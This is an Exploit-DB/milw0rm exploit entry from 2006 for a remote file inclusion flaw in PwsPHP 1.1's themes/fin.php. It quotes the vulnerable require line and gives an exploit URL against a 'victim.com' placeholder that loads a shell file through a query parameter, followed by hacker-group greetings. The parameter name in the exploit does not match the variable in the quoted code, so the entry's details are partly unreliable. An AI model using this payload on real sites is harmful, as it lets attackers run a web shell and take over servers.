PwsPHP <= 1.1 themes/fin.php Remote File Include Vulnerablity

2006-10-31T00:00:00
ID EDB-ID:2693
Type exploitdb
Reporter 3l3ctric-Cracker
Modified 2006-10-31T00:00:00

Description

PwsPHP <= 1.1 (themes/fin.php) Remote File Include Vulnerablity. Webapps exploit for php platform

                                        
                                            ==========================================================================================================================
PwsPHP v1.1 (theme) File inclusion Vulnerablity
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz
Team-All My Friends
================================================================================================
http://www.comscripts.com/scripts/php.pwsphp.1517.html
================================================================================================

# milw0rm.com [2006-10-31]